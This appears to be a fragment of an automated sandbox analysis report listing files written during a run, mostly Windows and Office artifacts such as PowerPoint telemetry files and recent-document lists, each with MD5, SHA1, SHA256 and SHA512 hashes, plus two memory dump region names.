SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 446dd1cf97eaba21cf14d03aebc79f27
SHA1 36e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256 a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512 a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

memory/1712-2598-0x0000029848180000-0x00000298482F6000-memory.dmp

memory/1712-2599-0x0000029848510000-0x000002984871A000-memory.dmp

C:\ProgramData\Microsoft\Windows\ClipSVC\GenuineTicket\GenuineTicket

MD5 923ce4120dffd5255bfccd38b53d9403
SHA1 49a6ee78cc1616864e2e35b76396add0452ee09c
SHA256 f7a53c5a32dd9fbd55a36bdb756f33ecf0f42f25eca8b6fafabd1fc516659e24
SHA512 5338a2425a753c1438447c1715443d3be21013e0a665a5b1c0ac1f1ecf474368bff9ad131ac7e8f94b4a75cfaa74fb976661d90181ca6ada109492efefdc1568

C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

MD5 f55463b1a128efa903fb629adca6b7ce
SHA1 fecee0b79e29631248a83cf89728c5a8f0784a0f
SHA256 f71f289fd5193e28ab535eb1905d625680a120b800679a4c85c3b8b0c191aa5a
SHA512 39db33612b5b8702e1e3983def08c039fabf368aeb55c5d4147806f3fcd79da4f4c8cec6fed04b02fa41e55eaba4cfc4d1820c148737cf02379f01acc598008a

C:\Users\Admin\Desktop\Baif oc -efjie.pptx

MD5 a929d0cc07ca52a3e84dfb0aa4a904ad
SHA1 e63098355e5f94f75646aebbc3c137d8ca069350
SHA256 1119508499e37575904be55842820c0c993175e490364b76ceca0d92600aa378
SHA512 5a8cb35926c43f6461e674c4757947a664f75b2be181c42208aa0e86c293618fab5e1b2884cd4bf729243ace5e26123635654dd7c892b2c6d5fde310fc2fa4d5

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d00655d2aa12ff6d.customDestinations-ms

MD5 f89d917428aa9ed8b93133b915aa8562
SHA1 b4b6a45d4da59e0b509ebba7448ba9d9c763e8b2
SHA256 48b896e32c43849347f9b7277a22734d1fcc2720125892ff2c0bb259876c1994
SHA512 a8ed8e829b91f8d5b1b4d3bd5ffd145f53b3bb2f2720874f70ffd472188dca6c06659d3929fb96313d7e22fe46da0d275f5445877337ef2b7f461a5866bd0dcc

C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Powerpoint.CampaignStates.json

MD5 f1b59332b953b3c99b3c95a44249c0d2
SHA1 1b16a2ca32bf8481e18ff8b7365229b598908991
SHA256 138e49660d259061d8152137abd8829acdfb78b69179890beb489fe3ffe23e0c
SHA512 3c1f99ecc394df3741be875fbe8d95e249d1d9ac220805794a22caf81620d5fdd3cce19260d94c0829b3160b28a2b4042e46b56398e60f72134e49254e9679a4

C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Powerpoint.SurveyEventActivityStats.json

MD5 6ca4960355e4951c72aa5f6364e459d5
SHA1 2fd90b4ec32804dff7a41b6e63c8b0a40b592113
SHA256 88301f0b7e96132a2699a8bce47d120855c7f0a37054540019e3204d6bcbaba3
SHA512 8544cd778717788b7484faf2001f463320a357db63cb72715c1395ef19d32eec4278bab07f15de3f4fed6af7e4f96c41908a0c45be94d5cdd8121877eccf310d

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d00655d2aa12ff6d.customDestinations-ms

MD5 7989c2f0f3622677a859da707fd63c6d
SHA1 06442c4cef1d388fd67d55478082560a3c68691f
SHA256 f0c5f10e0d3b59dfacc5594774a7f58bc3b2c6ae76ff8fa3fcaaacf033e5ac69
SHA512 e0f205e19c92d2d0d61007f325c77725b53d101638d6a6cc77acf2e41ad89e7804b8c5d76c66941c6debd060cb5fc094efbf5c9e21a1272803dbdae840515d47

C:\Users\Admin\AppData\Local\Microsoft\Office\DLP\mip\logs\mip_sdk.miplog

MD5 fe308d716c65a83f4b80eaeb5f6761fe
SHA1 867d029792faa49b16b8c27a030a50667f9ec147
SHA256 362f35c4f957dff230c8b6e8e1a9208619db47f22c3a84f2d91866aad3d8de0e
SHA512 57076ede3a44adbf2ebae24d6e0bffdd089c7bc81fc7c8ce6a7ac5bc2eabb2f4d28e4ec6a0e8ca70d7056fd35c0a0bdd3c7f8f776b90ecd32f03533e2aee2161